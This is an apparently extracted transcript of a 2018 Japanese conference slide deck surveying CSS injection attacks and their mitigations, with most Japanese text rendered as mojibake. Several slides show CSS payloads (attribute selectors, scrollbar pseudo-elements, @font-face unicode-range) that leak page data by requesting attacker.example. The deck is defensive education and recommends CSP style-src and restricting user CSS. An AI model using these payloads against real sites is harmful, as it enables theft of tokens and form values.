CSS Injection ++ - 既存手法の概観と対策

Takashi Yoneuchi  
ja: @lmt_swallow , en: @y0n3uchy
https://shift-js.info
"File:CSS3 logo and wordmark.svg." Wikimedia Commons, the free media repository. 28 Feb 2018, 03:50 UTC. 25 Aug 2018, 05:09 title=File:CSS3_logo_and_wordmark.svg&oldid=289484916>.
CSS Injection ++ 
طଘख๏ͷ֓؍ͱରࡦ

View Slide

© 2018 shift-js.info All Rights Reserved.
@lmt_swallow
‣ 5BLBTIJ:POFVDIJ 
BLB!ZOVDIZ
‣ EPEPEPEP $5'5FBN

J 54(
‣ 4&$$0/#FHJOOFST
DUGC
TFDDBNQTUB⒎
‣ 8FC4FDVSJUZ3FTFBSDIFS
8BOOBCF
‣ IUUQTTIJGUKTJOGP

View Slide

CSS Injection ͱ͸

View Slide

© 2018 shift-js.info
CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
CSS Injection 
੬ऑੑͷ֓ཁ
‣ "CSS injection vulnerabilities arise when an
application imports a style sheet from a user-
supplied URL, or embeds user input in CSS blocks
without adequate escaping. " 
(PortSwigger, https://portswigger.net/kb/issues/00501300_css-injection-reﬂected) 
‣ ߈ܸऀ͕೚ҙ CSS ϑΝΠϧͷΠϯϙʔτΛͤͨ͞Γ,
ΛΤεέʔϓແ͠ͰૠೖͰ͖Δ੬ऑੑ<br/>4<br/>

View Slide

Threats 
CSS Injection ͷڴҖ
‣ ʮͨͩ CSS ͕ૠೖͰ͖Δ͚ͩ͡Όͳ͍ͷ? ʯ
‣ ౴͑͸NO: े෼߈ܸͱͯ͠੒ཱ͢Δɻ
‣ CSS Injection ͷڴҖ͸࣍ͷΑ͏ʹ෼ྨͰ͖Δ:
‣ CSS ʹΑΔϖʔδίϯςϯπͷநग़
‣ ଐੑ (attribute) நग़
‣ λά಺ίϯςϯπநग़
‣ (CSS ͔Βͷ JavaScript ࣮ߦ (outdate))
5

View Slide

Even if it seems "invisible" ...? 
ݟ͑ͳ͍Α͏ʹݟ͑ͯ΋, ࣮͸…
‣ ࣮͸ λά౳͢Β style Λௐ੔Մೳ<br/>‣ CSS Injection ͷର৅ʹͳΔ<br/>6<br/><head><br/><style><br/>script { display: block; }<br/></style><br/></head><br/><body><br/><script> var secret = "hello";

View Slide

طଘख๏ͷ֓؍

View Slide

JS Execution from CSS 
CSS ͔Βͷ JS ࣮ߦ
‣ ੲ͸͍͔ͭ͘ͷํ๏Ͱ JS (or ద౰ͳεΫϦ
ϓτݴޠ) ࣮ߦʹͭͳ͛Δٕ๏͕ଘࡏͨ͠ɻ
‣ .htc ϑΝΠϧͱ behavior: Λ࢖͏ྫ
‣ expression: Λ࢖͏ྫ
‣ Ϟμϯͳϒϥ΢βͰ͸ (஌ΔݶΓ) ࣮ݱෆՄ
ೳͰ͋Δɻ
8

View Slide

Steal Values of Attributes 
ଐੑ஋ΛϦʔΫ͢Δ: ݪཧ
‣ ࣍ͷΑ͏ͳ HTML λάΛߟ͑Α͏: 
 
‣ ͜Ε͸࣍ͷ 3 ͭͷ CSS ηϨΫλશͯʹ
Ϛον͢Δ: 
input[value ^= "a"] { /* ... */ } 
input[value ^= "ab"] { /* ... */ } 
input[value ^= "abc"] { /* ... */ } 
‣ ͜ΕΛԠ༻͢Δͱ, ଐੑ஋Λ leak Մೳɻ
9

View Slide

ଐੑ஋ΛϦʔΫ͢Δ: શମਤ
10
input[value ^= "a"] { 
background: url(http://attacker.example/?a) 
} /* ... */

‘
߈ܸϕΫλ
ϦΫΤετ
ϦʔΫ
൓ࣹܕ
஝ੵܕ

View Slide

ଐੑ஋ΛϦʔΫ͢Δ: ۩ମతख๏ (1)
‣ ࣍ͷλάͷ value Λൈ͖͍ͨͱ͢Δ: 
 
‣ ࣍ͷΑ͏ͳ CSS Λ a-z ͷશͯ෼࡞ͬͯ Inject ͢Δ: 
 
 
aaa
‣ attacker.example Ͱ଴ͪड͚͍ͯΕ͹ GET /?a ͔Β
GET /?z ͷͲΕ͕ඈΜͰ͘Δɻ( ۩ମతʹ͸ GET /?a )
‣ 1 จࣈ໨ ("a") ͷ leak ୡ੒
11
input[value ^= "a"] {  
background: url(http://attacker.example/?a) 
}

View Slide

ଐੑ஋ΛϦʔΫ͢Δ: ۩ମతख๏ (2)
‣ ࣍ʹ, ্هͷΑ͏ͳ CSS Λ४උ͢Δ:
‣ ಉ༷ʹ Inject ͯ͠ attacker.example Ͱ଴ͪड͚͍ͯ
Ε͹, 2 จࣈ໨ ("b") ΋ leak Ͱ͖ΔɻҎ߱܁Γฦ͠ɻ
12
input[value ^= "aa"] {  
background: url(http://attacker.example/?aa) 
} 
/* ... */ 
input[value ^= "az"] { 
background: url(http://attacker.example/?az) 
}

View Slide

Steal Inner Values of Tags 
λά಺෦ͷ஋ΛϦʔΫ͢Δ: ֓؍
‣ ઌड़ͷํ๏Ͱ͸ CSS ηϨΫλͷ࢖͑Δ 
"ଐੑ஋" ͔͠ leak Ͱ͖ͳ͍ (҆શ!) ɻ
‣ ͔͠͠λά಺෦ͷ஋ͷ leak ΋, ผͷํ๏
Ͱ࣮ݱՄೳɻ͜Ε͸͕࣍ΩϞ:
‣ "Ligature" ͷ੍ޚ
‣ ͦͷεΫϩʔϧόʔ੍ޚʹΑΔݕ஌
‣ @SecurityMB ͞Μͷهࣄ͕෼͔Γ΍͍͢ 
https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-
wykorzystac-css-y-do-atakow-na-webaplikacje/
13

View Slide

λά಺෦ͷ஋ΛϦʔΫ͢Δ: શମਤ
14

‘
߈ܸϕΫλ
ϦΫΤετ
ϦʔΫ
൓ࣹܕ
஝ੵܕ

View Slide

λά಺෦ͷ஋ΛϦʔΫ͢Δ: શମਤ
15
ϑΥϯτ੍ޚ εΫϩʔϧόʔ੍ޚ
߈ܸϕΫλ = +
‣ ϑΥϯτ੍ޚ
‣ ಛఆ৚݅ԼͰͷΈεΫϩʔϧόʔ͕ੜ͡ΔΑ͏ʹௐ੔͢Δ
‣ εΫϩʔϧόʔ੍ޚ
‣ εΫϩʔϧόʔ͕ੜͨ͡ͱ͖ͷΈ, ଴ͪड͚αʔόʔʹϦΫ
ΤετΛඈ͹ͤ͞Δ

View Slide

λά಺෦ͷ஋ΛϦʔΫ͢Δ: ۩ମతख๏ (1)
16
ϑΥϯτ੍ޚ
f + i → ﬁ (Times)
‣ ্هͷΑ͏ͳ Ligature (߹ࣈ) ͸ϑΥϯτͰఆٛՄೳͰ͋Δɻ
‣ ͦ͜Ͱ, ࣍ͷΑ͏ͳϑΥϯτΛ༻ҙ͠, σʔλΛϦʔΫ͍ͨ͠
λάʹରͯ͠ઃఆ͢Δ:
‣ ಛఆͷจࣈͷฒͼ (e.g. abc) ʹରͯ͠͸, ϑΥϯτͷԣ෯Λ
े෼େ͖͘औΔ
‣ ͦΕҎ֎͸ϑΥϯτͷԣ෯Λ 0 ʹ͢Δ

View Slide

17
εΫϩʔϧόʔ੍ޚ
‣ ॳΊʹจࣈͷճΓࠐΈΛ௵͓ͯ͘͠: white-space: nowrap;
‣ ϑΥϯτ੍ޚʹΑΓ, ಛఆจࣈྻؚ͕·Ε͍ͯΔ৔߹ʹͷΈ,
εΫϩʔϧόʔ͕ੜ͡Δɻ
‣ ͋ͱ͸࣍ͷΑ͏ͳ CSS ΋ซͤͯ Inject ͓ͯ͘͠ͱ, εΫϩʔϧ
όʔදࣔΛ͖͔͚ͬʹ, ଴ͪड͚αʔόʔͱ௨৴͕Ͱ͖Δɻ
body::-webkit-scrollbar:horizontal {
background: url(http://attacker.example/leak);
}

View Slide

18
‣ ྫ͑͹ Hello, abc ͷ abc Λ leak ͍ͨ࣌͠
‣ "Hello, a" ͷΈ ligature ͱͯ͠ԣ෯͸େ͖͘, ͦΕҎ֎ͷ೚
ҙจࣈ͸ԣ෯ 0 Ͱ͋ΔΑ͏ͳϑΥϯτΛ༻ҙ͢Δ
‣ ༻ҙͨ͠ϑΥϯτͷઃఆͱ, εΫϩʔϧόʔ੍ޚΛߦ͏ CSS
Λ, ֤ϑΥϯτ͝ͱʹ Inject ͢Δɻ(→ ͲΕ͔ͰൃՐ͢Δ)
‣ 1 จࣈ໨ (= a ) ͕ leak Ͱ͖ͨΒ, ্هΛ܁Γฦ͢
‣ "Hello, ab", ... "Hello, az" ͳͲΛ४උ͢Δ, ͱ͍͏͜ͱ
ϑΥϯτ੍ޚ εΫϩʔϧόʔ੍ޚ
+

View Slide

Leak Candidates of Inner Values 
λά಺෦ͷจࣈछΛߜΔ/ͦͷॱংΛ஌Δ
‣ @font-face ͷࢦఆͰ, λά಺෦ͷจࣈछ͸ߜΕΔɻ
‣ unicode-range Λ࢖ͬͯ, ֤ Unicode ίʔυϙΠ
ϯτʹରͯ͠ผݸͷϑΥϯτιʔεΛࢦఆ͢Δɻ 
 
 
‣ ߈ܸऀ͸ඈΜͰ͖ͨϦΫΤετΛ଴ͪड͚Δɻ
‣ Reference: "@font-faceͷunicode-rangeΛར༻ͯ͠CSS͚ͩͰςΩετΛಡΈग़͢" 
by @masatokinugawa, http://masatokinugawa.l0.cm/2015/10/css-based-attack-
abusing-unicode-range.html
19
@font-face{ font-family:poc; unicode-range:U+0041; 
src: url(http://attacker.example/?A);}

View Slide

Leak Candidates of Inner Values 
λά಺෦ͷจࣈछΛߜΔ/ͦͷॱংΛ஌Δ
‣ ઌड़ͷख๏Ͱ͋Δจࣈͷొ৔͸஌Δ͜ͱ͕ग़དྷΔ͕, ͦͷ࢖༻
ճ਺ɾॱ൪͸෼͔Βͳ͍ → ෆ׬શͳ෮ݩɻ
‣ ॱ൪: CSS ͷ animation Λ૊Έ߹ΘͤΔ͜ͱͰ, จࣈͷॳొ
৔ॱΛอͪͭͭ, ϑΥϯτཁٻͷϦΫΤετΛඈ͹ͤ͞Δ͜
ͱ͕Ͱ͖Δɻ
‣ "HarekazeCTF2018 Web250 : A custom css for the ﬂag" 
by @KageShiron, http://blog.esora.xyz/HarekazeCTF2018-CSS#web250-jp  
‣ ճ਺: ͜ΕΛઌड़ͷख๏Λϕʔεʹ෮ݩ͢Δख๏͸ະ஌ (or
ଘࡏ͠ͳ͍?) (஌͍ͬͯͨΒڭ͍͑ͯͩ͘͞!)
20

View Slide

๷ޚͷࢹ఺͔Β: 
߈ܸܦ࿏ɾରࡦ

View Slide

Where can be exploited?
߈ܸܦ࿏
‣ Relative Path Overwrite (RPO)
‣ Writeup: "RPO Gadgets" 
by @ﬁledescriptor, https://blog.innerht.ml/rpo-gadgets/ 
‣ λάࣗମΛૠೖͰ͖Δ৔߹<br/>‣ ͜ͷ৔߹͸ͦ΋ͦ΋ <script> ΛૠೖͰ͖ͦ͏͕ͩ,<br/>blacklist ͷόΠύεʹ͸࢖͑Δ?<br/>‣ <style> λά಺ʹ೚ҙจࣈྻΛૠೖͰ͖Δ৔߹<br/>‣ ೚ҙ CSS ΛϢʔβʔ͕ઃఆͰ͖ΔՕॴ<br/>22<br/>

View Slide

Mitigations 
ରࡦ
‣ ΫϥΠΞϯτଆରࡦ: Content-Security-Policy
‣ ࠓճ঺հͨ͠߈ܸख๏͸, શͯ CSP ͷ style-src
σΟϨΫςΟϒʹΑΓ੍ݶՄೳͰ͋Δɻ
‣ αʔόʔଆରࡦ: ϢʔβʔʹΑΔ CSS ૠೖͷ੍ݶ
‣ CSS Injection ؚΊ, ೚ҙ CSS ΛૠೖͰ͖ΔՕॴ͸,
े෼ηΩϡϦςΟ্ͷϦεΫ଍ΓಘΔɻ
‣ Relative Path Overwrite ͕Մೳͳ৔߹, CSS ஫ೖ͕
Ͱ͖ͦ͏ʹͳ͍ͱ͜Ζʹ΋ةݥੑ͋Γ! ஫ҙɻ
23

View Slide

Thank you for listening :-)
Any Questions?
Takashi Yoneuchi
ja: @lmt_swallow, en: @y0n3uchy
https://shift-js.info

View Slide

CSS Injection ++ - 既存手法の概観と対策

CSS Injection ++ - 既存手法の概観と対策

Takashi Yoneuchi

More Decks by Takashi Yoneuchi

Other Decks in Technology

Featured

Transcript